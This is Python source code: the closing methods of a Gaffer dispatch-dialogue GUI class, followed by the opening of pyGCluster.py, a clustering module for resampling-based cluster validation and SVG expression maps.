def createWithDefaultDispatchers( tasks, nodesToShow, defaultDispatcherType=None, postDispatchBehaviour=PostDispatchBehaviour.Confirm, title="Dispatch Tasks", sizeMode=GafferUI.Window.SizeMode.Manual, **kw ) :
defaultType = defaultDispatcherType if defaultDispatcherType else GafferDispatch.Dispatcher.getDefaultDispatcherType()
dispatcherTypes = list(GafferDispatch.Dispatcher.registeredDispatchers())
if defaultType and defaultType in dispatcherTypes :
dispatcherTypes.remove( defaultType )
dispatcherTypes.insert( 0, defaultType )
dispatchers = []
for key in dispatcherTypes :
dispatcher = GafferDispatch.Dispatcher.create( key )
Gaffer.NodeAlgo.applyUserDefaults( dispatcher )
dispatchers.append( dispatcher )
return DispatchDialogue( tasks, dispatchers, nodesToShow, postDispatchBehaviour=postDispatchBehaviour, title = title, sizeMode = sizeMode, **kw )
def scriptNode( self ) :
return self.__script
def setVisible( self, visible ) :
if visible :
# See comment in `GafferUI.NodeSetEditor.acquire()`
self._qtWidget().resize( 400, 400 )
GafferUI.Window.setVisible( self, visible )
## Returns an IECore.MenuDefinition which is used to define the keyboard shortcuts for all DispatchDialogues.
# This can be edited at any time to modify subsequently created DispatchDialogues.
# Typically editing would be done as part of gaffer startup. Note that this menu is never shown to users,
# but we need it in order to register keyboard shortcuts.
@classmethod
def menuDefinition( cls ) :
if cls.__dispatchDialogueMenuDefinition is None :
cls.__dispatchDialogueMenuDefinition = IECore.MenuDefinition()
return cls.__dispatchDialogueMenuDefinition
def __nodeEditor( self, node ) :
editor = GafferUI.NodeEditor( self.__script )
editor.setNodeSet( Gaffer.StandardSet( [ node ] ) )
## \todo: Expose public API for the NodeEditor's NameWidget visibility
editor._NodeEditor__nameWidget.setVisible( False )
editor._NodeEditor__nameWidget.parent()[0].setVisible( False )
return editor
def __setDispatcher( self, dispatcher ) :
self.__currentDispatcher = dispatcher
self.__dispatcherFrame.setChild( self.__nodeEditor( self.__currentDispatcher ) )
def __dispatcherChanged( self, menu ) :
for dispatcher in self.__dispatchers :
if dispatcher.getName() == menu.getSelection()[0] :
self.__setDispatcher( dispatcher )
return
def __initiateSettings( self, button ) :
self.__backButton.setEnabled( False )
self.__backButton.setVisible( False )
self.__primaryButton.setText( "Dispatch" )
self.__primaryButton.setEnabled( True )
self.__primaryButton.setVisible( True )
self.__primaryButtonConnection = self.__primaryButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateDispatch ) )
self.__tabs.setCurrent( self.__tabs[0] )
self._getWidget().setChild( self.__settings )
def __initiateDispatch( self, button ) :
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Dispatching...</h3>" )
self.__backButton.setVisible( False )
self.__backButton.setEnabled( False )
self.__primaryButton.setVisible( False )
self.__primaryButton.setEnabled( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self._getWidget().setChild( self.__progressUI )
threading.Thread( target = self.__dispatch ).start()
def __dispatch( self ) :
try :
with self.__messageWidget.messageHandler() :
with self.__script.context() :
self.__currentDispatcher.dispatch( self.__tasks )
result = 0
except Exception, e :
result = sys.exc_info()
GafferUI.EventLoop.executeOnUIThread( functools.partial( self.__finish, result ) )
def __finish( self, result ) :
if result == 0 :
self.__initiateResultDisplay()
else :
self.__initiateErrorDisplay( result )
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
# this works for RuntimeError, but is this safe for all exceptions?
userFriendlyException = exceptionInfo[1].args[0].strip( "\n" ).split( "\n" )[-1]
userFriendlyException += "\nSee DEBUG messages for more information."
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Dispatching {nodes}".format( nodes = str( [ task.relativeName( self.__script ) for task in self.__tasks ] ) ),
userFriendlyException,
)
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButton._qtWidget().setFocus()
self.__primaryButton.setText( "Quit" )
self.__primaryButton.setEnabled( True )
self.__primaryButton.setVisible( True )
self.__primaryButtonConnection = self.__primaryButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
def __initiateResultDisplay( self ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems and self.__postDispatchBehaviour == self.PostDispatchBehaviour.Close :
self.close()
return
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageCollapsible.setVisible( self.__messageWidget.messageCount() )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__primaryButton.setText( "Ok" )
self.__primaryButton.setEnabled( True )
self.__primaryButton.setVisible( True )
self.__primaryButtonConnection = self.__primaryButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__primaryButton._qtWidget().setFocus()
def __close( self, *unused ) :
self.close()
def __messageCollapsibleChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleConneciton = None
|
pyGCluster.py
|
#!/usr/bin/env python2.7
"""
pyGCluster is a clustering algorithm focusing on noise injection for subsequent cluster validation.
By requesting identical cluster identity, the reproducibility of a large amount of clusters
obtained with agglomerative hierarchical clustering (AHC) is assessed.
Furthermore, a multitude of different distance-linkage combinations (DLCs) are evaluated.
Finally, associations of highly reproducible clusters, called communities, are created.
Graphical representation of the results as node maps and expression maps is implemented.
The pyGCluster module contains the main class :py:class:`pyGCluster.Cluster` and some functions
| :py:func:`pyGCluster.create_default_alphabet`
| :py:func:`pyGCluster.resampling_multiprocess`
| :py:func:`pyGCluster.seekAndDestry`
| :py:func:`pyGCluster.yield_noisejected_dataset`
"""
#
# pyGCluster
#
# Copyright (C) D. Jaeger and C. Fufezan
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from __future__ import print_function
import sys, os
from collections import defaultdict as ddict
from collections import OrderedDict
import math
import time
import random
import subprocess
import string
import codecs
import bisect
import multiprocessing
import itertools
if sys.version_info[0] == 3:
import pickle
def unicode(x, errors=None):
return x
input = input
else: # 2k, explicitely import cPickle
import cPickle as pickle
input = raw_input
def yield_noisejected_dataset(data, iterations):
'''
Generator yielding a re-sampled dataset with each iteration.
A re-sampled dataset is created by re-sampling each data point
from the normal distribution given by its associated mean and standard deviation value.
See the example in Supplementary Material in pyGCluster's publication for how to define an own noise-function (e.g. uniform noise).
:param data: dictionary ( OrderedDict! ) holding the data to be re-sampled.
:type data: collections.OrderedDict()
:param iterations: the number of re-sampled datasets this generator will yield.
:type iterations: int
:rtype: none
'''
import numpy
# the check that no condition is missing in arg: data is made prior, in Cluster.__init__()
# this is required, because only equally shaped arrays can be clustered!
# otherwise, 'ValueError: setting an array element with a sequence.'
Random = numpy.random.RandomState() # get instance for new seed!
n_conditions = len( data[ sorted( data.keys() )[ 0 ] ] )
simulated_dataset = numpy.zeros( ( len( data ), n_conditions ) )
for i in range( iterations ):
for row_index, identifier in enumerate( data ):
for col_index, (condition, data_tuple) in enumerate( data[ identifier ].items() ):
mean, sd = data_tuple
new_ratio = Random.normal( mean, sd )
simulated_dataset[ row_index ][ col_index ] = new_ratio
yield simulated_dataset
return
def create_default_alphabet():
'''
Returns the default alphabet which is used to save clusters in a lesser memory-intense form:
instead of saving e.g. a cluster containing identifiers with indices of 1,20,30 as "1,20,30", the indices are converted to a baseX system -> "1,k,u".
The default alphabet that is returned is:
>>> string.printable.replace( ',', '' )
:rtype: string
'''
return string.printable.replace( ',', '' )
def seekAndDestry(processes):
'''
Any multiprocesses given by processes are terminated.
:param processes: list containing multiprocess.Process()
:type processes: list
:rtype: none
'''
for p in processes:
if p.is_alive():
p.terminate()
return
def resampling_multiprocess(
DataQ = None,
data = None,
iterations = 5000,
alphabet = None,
dlc = None,
min_cluster_size = 4,
min_cluster_freq_2_retain = 0.001,
function_2_generate_noise_injected_datasets = None
):
'''
This is the function that is called for each multiprocesses that is evoked internally in pyGCluster during the re-sampling routine.
Agglomerative hierarchical clustering is performed for each distance-linkage combination (DLC) on each of iteration datasets.
Clusters from each hierarchical tree are extracted, and their counts are saved in a temporary cluster-count matrix.
After *iterations* iterations, clusters are filtered according to min_cluster_freq_2_retain.
These clusters, together with their respective counts among all DLCs, are returned.
The return value is a list containing tuples with two elements: cluster (string) and counts ( one dimensional np.array )
:param DataQ: data queue which is used to pipe the re-sampling results back to pyGCluster.
:type DataQ: multiprocessing.Queue()
:param data: dictionary ( OrderedDict! ) holding the data to be clustered -> passed through to the noise-function.
:type data: collections.OrderedDict()
:param iterations: the number of iterations this multiprocess is going to perform.
:type iterations: int
:param alphabet: in order to save memory, the indices describing a cluster are converted to a specific alphabet (rather than decimal system).
:type alphabet: string
:param dlc: list of the distance-linkage combinations that are going to be evaluated.
:type dlc: list
:param min_cluster_size: minimum size of a cluster to be considered in the re-sampling routine (smaller clusters are discarded)
:type min_cluster_size: int
:param min_cluster_freq_2_retain: once all iterations are performed, clusters are filtered according to 50% (because typically forwarded from pyGCluster) of this threshold.
:type min_cluster_freq_2_retain: float
:param function_2_generate_noise_injected_datasets: function to generate re-sampled datasets.
:type function_2_generate_noise_injected_datasets: function
:rtype: list
'''
import numpy
import scipy.spatial.distance as ssd
imported_from_scipy = False
try:
from fastcluster import linkage as ahc
except ImportError:
try:
from scipy.cluster.hierarchy import linkage as ahc
imported_from_scipy = True
except ImportError:
print('You do require either "fastcluster" or "scipy"!')
if DataQ is None or data is None:
print( '[ ERROR ] need a Data-Queune and a data object! Returning ...' )
return
if alphabet is None:
alphabet = create_default_alphabet()
assert ',' not in alphabet, '[ ERROR ] the alphabet must not contain a comma (",")!'
if dlc is None:
dlc = [ 'euclidean-average' ] # NOTE maybe better have all as default ! :)
if function_2_generate_noise_injected_datasets is None:
function_2_generate_noise_injected_datasets = yield_noisejected_dataset
n_objects = len( data.keys() )
n_dlc = len( dlc )
metrices = set( [ combo.split( '-' )[ 0 ] for combo in dlc ] )
# build lookup-dict to convert index into baseX system, given by alphabet
baseX = len( alphabet )
index2baseX = { 0 : '0' }
for index in range( 1, n_objects ):
old_index = index
digits = [] # modified ref: http://stackoverflow.com/questions/2267362/convert-integer-to-a-string-in-a-given-numeric-base-in-python
while index:
digits.append( alphabet[ index % baseX ] )
index = int( round( index / baseX ) )
digits.reverse()
converted_index = ''.join( digits )
index2baseX[ old_index ] = converted_index
# build initial template of 'clusters'-dict (which is needed to extract clusters from the hierarchical tree)
clusters_template = { ID : [ index2baseX[ ID ] ] for ID in range( n_objects ) }
# initialize temporary cluster-count matrix and the other necessary objects to fill it
tmpstruct_clustercount_monitor = {}
tmpstruct_clustercount_monitor[ 'Cluster counts' ] = numpy.zeros( ( 10 ** 6, n_dlc ), dtype = numpy.uint32 )
tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ] = {}
tmpstruct_clustercount_monitor[ 'Distance-linkage combinations' ] = dlc
tmpstruct_clustercount_monitor[ 'Cluster sieve' ] = set()
tmpstruct_clustercount_monitor[ 'Discarded IDs' ] = set()
# get simulated datasets
for simulated_dataset in function_2_generate_noise_injected_datasets( data, iterations ):
# calculate distance matrices:
metric2condenseddist = {}
if not imported_from_scipy:
for metric in metrices:
metric2condenseddist[ metric ] = ssd.pdist( simulated_dataset, metric = metric )
# perform AHC:
for dlc_index, combo in enumerate( dlc ):
metric, linkage = combo.split( '-' )
'''
linkage matrix example:
original data:
[[1,2,3],
[3,2,1],
[1,3,5]]
Linkage matrix representing AHC with euclidean distance and ward linkage:
[[ 0. , 2. , 2.23606798, 2. ], CLUSTER ID 3
[ 1. , 3. , 4.2031734 , 3. ]] CLUSTER ID 4
^ child1 ^ child2 ^ distance ^ cluster size
Hence, element 0 and 2 were merged into cluster with ID = 3 (size = 2),
then element 1 and cluster 3 are merged into the root cluster with ID = 4 (size = 3).
'''
# perform AHC
if imported_from_scipy:
linkage_matrix = ahc( simulated_dataset, method = linkage, metric = metric )
else:
linkage_matrix = ahc( metric2condenseddist[ metric ], method = linkage, preserve_input = True )
# reconstruct clusters from the linkage matrix
clusters = {} # key = clusterID, value = cluster-indices
clusters.update( clusters_template )
clusterID_linkagematrix = n_objects - 1
for childID_1, childID_2, dist, size in linkage_matrix:
clusterID_linkagematrix += 1
cluster_linkagematrix = sorted( clusters[ childID_1 ] + clusters[ childID_2 ] )
clusters[ clusterID_linkagematrix ] = cluster_linkagematrix
if len( cluster_linkagematrix ) < min_cluster_size:
continue
cluster = ','.join( cluster_linkagematrix )
# insert cluster into tmpstruct_clustercount_monitor and update it:
# but add only if its count > 1 (determined via the 'Cluster sieve'):
add = False
if cluster in tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ]:
clusterID = tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ][ cluster ]
add = True
else:
if cluster in tmpstruct_clustercount_monitor[ 'Cluster sieve' ]:
if tmpstruct_clustercount_monitor[ 'Discarded IDs' ]:
try:
clusterID = tmpstruct_clustercount_monitor[ 'Discarded IDs' ].pop()
except KeyError: # KeyError: 'pop from an empty set' = set is empty
clusterID = len( tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ] )
else:
clusterID = len( tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ] )
tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ][ cluster ] = clusterID
add = True
else:
tmpstruct_clustercount_monitor[ 'Cluster sieve' ].add( cluster )
add = False
if add:
# increase count by 1
# if new cluster, add 10 ** 5 new rows
try:
tmpstruct_clustercount_monitor[ 'Cluster counts' ][ clusterID ][ dlc_index ] += 1
except IndexError:
tmpstruct_clustercount_monitor[ 'Cluster counts' ] = numpy.concatenate(
( tmpstruct_clustercount_monitor['Cluster counts'],
numpy.zeros( ( 10 ** 5, n_dlc ), dtype = numpy.uint32 )
)
)
tmpstruct_clustercount_monitor[ 'Cluster counts' ][ clusterID ][ dlc_index ] += 1 # increase count by 1
del clusters
del metric2condenseddist
del simulated_dataset
# only transfer clusters equal or above 50% of 'min_cluster_freq_2_retain' threshold to pyGCluster:
min_count = int( min_cluster_freq_2_retain * iterations * 0.5 )
clusterIDs2retain = set( numpy.nonzero( tmpstruct_clustercount_monitor[ 'Cluster counts' ] >= min_count )[ 0 ] )
cluster_counts_list = []
for cluster, clusterID in tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ].items():
if clusterID in clusterIDs2retain:
counts = tmpstruct_clustercount_monitor[ 'Cluster counts' ][ clusterID ]
cluster_counts_list.append( (cluster, counts) )
del tmpstruct_clustercount_monitor
DataQ.put( cluster_counts_list )
del cluster_counts_list
return
class Cluster(dict):
'''
The pyGCluster class
:param working_directory: directory in which all results are written (requires write-permission!).
:type working_directory: string
:param verbosity_level: either 0, 1 or 2.
:type verbosity_level: int
:param data: Dictionary containing the data which is to be clustered.
:type data: dict
In order to work with the default noise-injection function as well as plot
expression maps correctly, the data-dict **has** to have the following
structure.
Example:
>>> data = {
... Identifier1 : {
... condition1 : ( mean11, sd11 ),
... condition2 : ( mean12, sd12 ),
... condition3 : ( mean13, sd13 ),
... },
... Identifier2 : {
... condition2 : ( mean22, sd22 ),
... condition3 : ( mean23, sd23 ),
... condition3 : ( mean13, sd13 ),
... },
... }
>>> import pyGCluster
>>> ClusterClass = pyGCluster.Cluster(data=data, verbosity_level=1, working_directory=...)
.. note ::
If any condition for an identifier in the "nested_data_dict"-dict is missing,
this entry is discarded, i.e. not imported into the Cluster Class.
This is because pyGCluster does not implement any missing value estimation.
One possible solution is to replace missing values by a mean value and a standard
deviation that is representative for the complete data range in the given condition.
pyGCluster inherits from the regular Python Dictionary object.
Hence, the attributes of pyGCluster can be accessed as Python Dictionary keys.
A selection of the most important attributes / keys are:
>>> # general
>>> ClusterClass[ 'Working directory' ]
... # this is the directory where all pyGCluster results
... # (pickle objects, expression maps, node map, ...) are saved into.
/Users/Shared/moClusterDirectory
>>> # original data ca be accessed via
>>> ClusterClass[ 'Data' ]
... # this collections.OrderedDict contains the data that has been
... # or will be clustered (see also below).
... plenty of data ;)
>>> ClusterClass[ 'Conditions' ]
... # sorted list of all conditions that are defined in the "Data"-dictionary
[ 'condition1', 'condition2', 'condition3' ]
>>> ClusterClass[ 'Identifiers' ]
... # sorted tuple of all identifiers, i.e. ClusterClass[ 'Data' ].keys()
( 'Identifier1', 'Identifier2' , ... 'IdentifierN' )
>>> # re-sampling paramerters
>>> ClusterClass[ 'Iterations' ]
... # the number of datasets that were clustered.
1000000
>>> ClusterClass[ 'Cluster 2 clusterID' ]
... # dictionary with clusters as keys, and their respective row index
... # in the "Cluster count"-matrix (= clusterID) as values.
{ ... }
>>> ClusterClass[ 'Cluster counts' ]
... # numpy.uint32 matrix holding the counts for each
... # distance-linkage combination of the clusters.
>>> ClusterClass[ 'Distance-linkage combinations' ]
... # sorted list containing the distance-linkage combinations
... # that were evaluted in the re-sampling routine.
>>> # Communities
>>> ClusterClass[ 'Communities' ]
... # see function pyGCluster.Cluster.build_nodemap for further information.
>>> # Visualization
>>> ClusterClass[ 'Additional labels' ]
... # dictionary with an identifier of the "Data"-dict as key,
... # and a list of additional information (e.g. annotation, GO terms) as value.
{
'Identifier1' :
['Photosynthesis related' , 'zeroFactor: 12.31' ],
'Identifier2' : [ ... ] ,
...
}
>>> ClusterClass[ 'for IO skip clusters bigger than' ]
... # Default = 100. Since some clusters are really large
... # (with sizes close to the root (the cluster holding all objects)),
... # clusters with more objects than this value
... # are not plotted as expression maps or expression profile plots.
pyGCluster offers the possibility to save the analysis (e.g. after re-sampling)
via :py:func:`pyGCluster.Cluster.save` , and continue
via :py:func:`pyGCluster.Cluster.load`
Initializes pyGCluster.Cluster class
Classically, users start the multiprocessing clustering routine with multiple
distance linkage combinations via the :py:func:`pyGCluster.Cluster.do_it_all`
function. This function allows to update the pyGCluster class with all user
parameters before it calls :py:func:`pyGCluster.Cluster.resample`.
The main advantage in calling :py:func:`pyGCluster.Cluster.do_it_all` is
that all general plotting functions are called afterwards as well, these are:
| :py:func:`pyGCluster.Cluster.plot_clusterfreqs`
| :py:func:`pyGCluster.Cluster.build_nodemap`
| :py:func:`pyGCluster.Cluster.write_dot`
| :py:func:`pyGCluster.Cluster.draw_community_expression_maps`
If one choses, one can manually update the parameters (setting the key, value
pairs in pyGCluster) and then evoke :py:func:`pyGCluster.Cluster.resample`
with the appropriate parameters. This useful if certain memory intensive
distance-linkage combinations are to be clustered on a specific computer.
.. note ::
Cluster Class can be initilized empty and filled using :py:func:`pyGCluster.Cluster.load`
'''
def __init__(self, data = None, working_directory = None, verbosity_level = 1):
self.delete_resampling_results() # initializes important variables
if working_directory is None:
working_directory = os.getcwd()
self[ 'Working directory' ] = working_directory
self[ 'for IO skip clusters bigger than' ] = 100
self[ 'Version' ] = (0, 7, 1)
self[ 'Verbosity level' ] = verbosity_level
self[ 'Additional labels' ] = {} # will be used as dict in draw functions, i.e. ids
self[ 'Data' ] = None
self[ 'Heat map'] = {
'Params': { 'title' : 'pyGCluster expression map',
'font family' : 'Helvetica',
'font size' : 14 ,
'rBox width' : 40,
'rBox height' : 20,
'left border' : 10,
'top border' : 70, # will be adjusted depending on the labels :)
'text spacing' : 2,
'text width' : 2000,
'separator width': 7,
'min' : None,
'max' : None,
'legend filename': 'legend.svg',
'heat map filename' : 'expression_map.svg',
'default color' : [255, 255, 255],
'color gradient' : 'default',
},
'Color Gradients' : {
'default' : [(-1, (255,40,255)), (-0.40,(255,40,40)), (-0.05,(40,40,40)), (0,(0,0,0)), (+0.05,(40,40,40)), (+0.40,(40,255,40)), (+1,(255,255,40)) ],
'Daniel' : [(-1, (255,0,0)), (-0.01, (0,0,255)), (0, (0,0,0)), (0.01, (255,255,0)), (0.5, (0,255,0)), (1, (0,255,255))],
'barplot' : [(-1, ( 0,0,0)), (0, (0,0,0)), (0.0000001, (255,255,0)), (0.2, (255,0,0)), (1, (120,120,120))],
'1337' : [(-1, (255,0,0)), (-0.5,(255,0,255)), (-0.02,(77,77,77)), (0,(0,0,0)) ,(+0.02,(77,77,77)), (+0.5,(255,255,0)), (+1,(0,255,0)) ],
'BrBG' : [(-1, (166, 97, 26)), (-0.5, (223, 194, 125)), (0, (245, 245, 245)), (+0.5, (128, 205, 193)), (+1, (1, 133, 113)) ],
'PiYG' : [(-1, (208, 28, 139)), (-0.5, (241, 182, 218)), (0, (247, 247, 247)), (+0.5, (184, 225, 134)), (+1, (77, 172, 38)) ],
'PRGn' : [(-1, (123, 50, 148)), (-0.5, (194, 165, 207)), (0, (247, 247, 247)), (+0.5, (166, 219, 160)), (+1, (0, 136, 55)) ],
'PuOr' : [(-1, (230, 97, 1)), (-0.5, (253, 184, 99)), (0, (247, 247, 247)), (+0.5, (178, 171, 210)), (+1, (94, 60, 153)) ],
'RdBu' : [(-1, (202, 0, 32)), (-0.5, (244, 165, 130)), (0, (247, 247, 247)), (+0.5, (146, 197, 222)), (+1, (5, 113, 176)), ],
'RdGy' : [(-1, (202, 0, 32)), (-0.5, (244, 165, 130)), (0, (255, 255, 255)), (+0.5, (186, 186, 186)), (+1, (64, 64, 64)), ],
'RdYlBu' : [(-1, (215, 25, 28)), (-0.5, (253, 174, 97)), (0, (255, 255, 191)), (+0.5, (171, 217, 233)), (+1, (44, 123, 182)), ],
'RdYlGn' : [(-1, (215, 25, 28)), (-0.5, (253, 174, 97)), (0, (255, 255, 191)), (+0.5, (166, 217, 106)), (+1, (26, 150, 65)), ],
'Spectral' : [(-1, (215, 25, 28)), (-0.5, (253, 174, 97)), (0, (255, 255, 191)), (+0.5, (171, 221, 164)), (+1, (43, 131, 186)), ],
'Spectral_up' : [(-1, (215, 25, 28)), (-0.75, (215, 25, 28)), (-0.5, (215, 25, 28)), (-0.25, (215, 25, 28)), (-0.01, (215, 25, 28)), (0, (215, 25, 28)), (+0.01, (215, 25, 28)), (+0.25, (253, 174, 97)), (+0.5, (255, 255, 191)), (+0.75, (171, 221, 164)), (+1, (43, 131, 186)) ],
},
'SVG box styles' : {
'modern' : '''
<g id="rowPos{0}_conPos{1}">
<title>{ratio}±{std} - [{x0}.{y0} w:{width} h:{height}</title>
<rect x="{x0}" y="{y0}" width="{width}" height="{height}" style="fill:rgb({r},{g},{b});fill-opacity:0.2;stroke:white;stroke-width:1;" title="{ratio}±{std}" />
<path d = "M {x0} {y0} L {x3} {y0} L {x2} {y1} L {x1} {y1} L {x1} {y2} L {x0} {y3} L {x0} {y0}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x2} {y2} L {x1} {y2} L {x2} {y1} L {x2} {y2}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x1} {y1} L {x1} {y2} L {x2} {y1} L {x1} {y1}" style="fill:rgb({r},{g},{b}); fill-opacity:0.7; stroke:red;stroke-width:1;stroke-opacity:0.0;"/>
</g>''',
'fusion' : '''
<g id="rowPos{0}_conPos{1}">
<title>{ratio}±{std} - [{x0}.{y0} w:{width} h:{height}</title>
<rect x="{x0}" y="{y0}" width="{width}" height="{height}" style="fill:rgb({r},{g},{b});fill-opacity:0.7;stroke:white;stroke-width:1;" title="{ratio}±{std}" />
<path d = "M {x0} {y0} L {x3} {y0} L {x2} {y1} L {x1} {y1} L {x1} {y2} L {x0} {y3} L {x0} {y0}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x2} {y2} L {x1} {y2} L {x2} {y1} L {x2} {y2}" style="fill:rgb({r},{g},{b});stroke:black;stroke-width:1;stroke-opacity:0.0;"/>
<path d = "M {x1} {y1} L {x1} {y2} L {x2} {y1} L {x1} {y1}" style="fill:rgb({r},{g},{b}); fill-opacity:0.7; stroke:red;stroke-width:1;stroke-opacity:0.0;"/>
<rect x="{x1}" y="{y1}" width="{widthNew}" height="{heightNew}" style="fill:None;stroke:black;stroke-width:1;" title="{ratio}±{std}" />
</g>''',
'classic' : '''
<g id="rowPos{0}_conPos{1}">
<title>{ratio}±{std} - [{x0}.{y0} w:{width} h:{height}</title>
<rect x="{x0}" y="{y0}" width="{width}" height="{height}" style="fill:rgb({r},{g},{b});stroke:white;stroke-width:1;" title="{ratio}±{std}" />
<rect x="{x1}" y="{y1}" width="{widthNew}" height="{heightNew}" style="fill:None;stroke:black;stroke-width:1;" title="{ratio}±{std}" />
</g>''',
}
}
# check if data is valid, i.e. contains a value for each condition
data_as_ordered_dict = OrderedDict()
if data != None:
conditions = set()
# determine number of different conditions:
for identifier in data.keys():
for condition in data[ identifier ].keys():
conditions.add(condition)
for identifier in list(data.keys()):
# discard entry if any condition is missing:
missing_conditions = conditions - set( data[ identifier ].keys() )
if len(missing_conditions) > 0:
del data[identifier]
for identifier in sorted( data ):
data_as_ordered_dict[ identifier ] = OrderedDict()
for condition in sorted( data[ identifier ] ):
data_as_ordered_dict[ identifier ][ condition ] = data[ identifier ][ condition ]
self[ 'Conditions' ] = sorted( conditions )
self[ 'Data' ] = data_as_ordered_dict
self[ 'Identifiers' ] = tuple( sorted( data ) )
self[ 'Root size' ] = len( data )
self[ 'Root' ] = tuple( range( self[ 'Root size' ] ) )
if not self.check_if_data_is_log2_transformed():
self._print( '[ WARNING ] there are NO ratios < 0! Is the data log2 transformed?', file=sys.stderr, verbosity_level = 1 )
s = 'pyGCluster initialized with {0} objects among {1} different conditions.'
self._print( s.format( len( data.keys() ), len( conditions ) ), verbosity_level = 1 )
return
def draw_expression_map( self, identifiers = None, data = None, conditions = None, additional_labels = None, min_value_4_expression_map = None, max_value_4_expression_map = None, expression_map_filename = None, legend_filename = None, color_gradient = None , box_style = 'classic' ):
'''
Draws expression map as SVG
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param expression_map_filename: file name for expression map. .svg will be added if required.
:type expression_map_filename: string
:param legend_filename: file name for legend .svg will be added if required.
:type legend_filename: string
:param box_style: the way the relative standard deviation is visualized in the expression map. Currently supported are 'modern', 'fusion' or 'classic'.
:type box_style: string
:param additional_labels: dictionary, where additional labels can be defined which will be added in the expression map plots to the gene/protein names
:type additional_labels: dict
:rtype: none
Data has to be a nested dict in the following format:
>>> data = {
... fastaID1 : {
... cond1 : ( mean, sd ) , cond2 : ( mean, sd ), ...
... }
... fastaID2 : {
... cond1 : ( mean, sd ) , cond2 : ( mean, sd ), ...
... }
... }
optional and, if needed, data will be extracted from
| self[ 'Data' ]
| self[ 'Identifiers' ]
| self[ 'Conditions' ]
'''
if additional_labels is None:
additional_labels = {}
if conditions is None:
conditions = set()
for identifier in data.keys():
conditions |= set( data[ identifier ].keys() )
conditions = sorted( list( conditions ) )
if identifiers is None:
if type(data) == type(OrderedDict()):
identifiers = list( data.keys() )
else:
identifiers = sorted(list( data.keys() ))
#
# Updating self[ 'Additional labels' ]
#
if additional_labels != None:
for identifier in additional_labels.keys():
if identifier not in self[ 'Additional labels' ].keys():
self[ 'Additional labels' ][ identifier ] = []
# self[ 'Additional labels' ][ identifier ] += additional_labels[ identifier ]
#
# Updating min/max if required
#
if max_value_4_expression_map != None:
self[ 'Heat map'][ 'Params' ][ 'max' ] = max_value_4_expression_map
if min_value_4_expression_map != None:
self[ 'Heat map'][ 'Params' ][ 'min' ] = min_value_4_expression_map
#
# determine range id needed
#
if self[ 'Heat map'][ 'Params' ][ 'min' ] is None or self[ 'Heat map'][ 'Params' ][ 'max' ] is None:
allValues = []
for identifier in data.keys():
for condition in data[ identifier ].keys():
allValues.append( data[ identifier ][ condition][0] )
if self[ 'Heat map' ][ 'Params' ][ 'min' ] is None:
self[ 'Heat map' ][ 'Params' ][ 'min' ] = math.floor( min( allValues ) )
if self[ 'Heat map' ][ 'Params' ][ 'max' ] is None:
self[ 'Heat map' ][ 'Params' ][ 'max' ] = math.ceil( max( allValues ) )
#
# setting default color gradient if match is found
#
if color_gradient != None:
if color_gradient not in self[ 'Heat map' ][ 'Color Gradients' ].keys():
print('Do not know color gradient {0}, falling back to default'.format( color_gradient ), file = sys.stderr)
color_gradient = 'default'
self[ 'Heat map' ][ 'Params' ][ 'color gradient' ] = color_gradient
#
#
#
if expression_map_filename != None:
